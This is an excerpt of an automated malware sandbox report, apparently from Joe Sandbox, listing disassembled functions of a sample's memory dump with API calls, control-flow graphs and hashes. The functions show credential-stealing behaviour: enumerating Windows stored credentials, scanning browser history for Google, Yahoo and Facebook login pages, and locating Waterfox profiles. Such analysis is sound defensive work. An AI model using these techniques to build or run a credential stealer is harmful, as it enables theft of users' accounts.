                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                            • String ID: chp$v10
                                                            • API String ID: 170802307-2783969131
                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                            • String ID:
                                                            • API String ID: 3715365532-3916222277
                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                            • String ID: bhv
                                                            • API String ID: 327780389-2689659898
                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                            • API String ID: 2941347001-70141382
                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 651 446755-446758 648->651 650->642 654 44673d-446745 650->654 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 667 446853-446864 GetStartupInfoW 662->667 668 44684d-446851 662->668 663->661 664->660 664->665 665->662 669 446840-446842 665->669 671 446866-44686a 667->671 672 446879-44687b 667->672 668->667 668->669 669->662 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                            • String ID:
                                                            • API String ID: 2827331108-0
                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0040C298
                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                            • wcschr.MSVCRT ref: 0040C324
                                                            • wcschr.MSVCRT ref: 0040C344
                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                            • String ID: visited:
                                                            • API String ID: 1157525455-1702587658
                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                            APIs
                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                            • memset.MSVCRT ref: 0040E1BD
                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                            • API String ID: 3883404497-2982631422
                                                            • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                            • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                            • memset.MSVCRT ref: 0040BC75
                                                            • memset.MSVCRT ref: 0040BC8C
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                            • memcmp.MSVCRT ref: 0040BCD6
                                                            • memcpy.MSVCRT ref: 0040BD2B
                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                            • String ID:
                                                            • API String ID: 509814883-3916222277
                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CreateFile$??3@ErrorLast
                                                            • String ID: |A
                                                            • API String ID: 1407640353-1717621600
                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                            • String ID: r!A
                                                            • API String ID: 2791114272-628097481
                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                            • wcslen.MSVCRT ref: 0040C82C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                            • API String ID: 62308376-4196376884
                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                            • wcslen.MSVCRT ref: 0040BE06
                                                            • _wcsncoll.MSVCRT ref: 0040BE38
                                                            • memset.MSVCRT ref: 0040BE91
                                                            • memcpy.MSVCRT ref: 0040BEB2
                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                            • wcschr.MSVCRT ref: 0040BF24
                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                            • String ID:
                                                            • API String ID: 3191383707-0
                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00403CBF
                                                            • memset.MSVCRT ref: 00403CD4
                                                            • memset.MSVCRT ref: 00403CE9
                                                            • memset.MSVCRT ref: 00403CFE
                                                            • memset.MSVCRT ref: 00403D13
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 00403DDA
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                            • String ID: Waterfox$Waterfox\Profiles
                                                            • API String ID: 3527940856-11920434
                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00403E50
                                                            • memset.MSVCRT ref: 00403E65
                                                            • memset.MSVCRT ref: 00403E7A
                                                            • memset.MSVCRT ref: 00403E8F
                                                            • memset.MSVCRT ref: 00403EA4
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
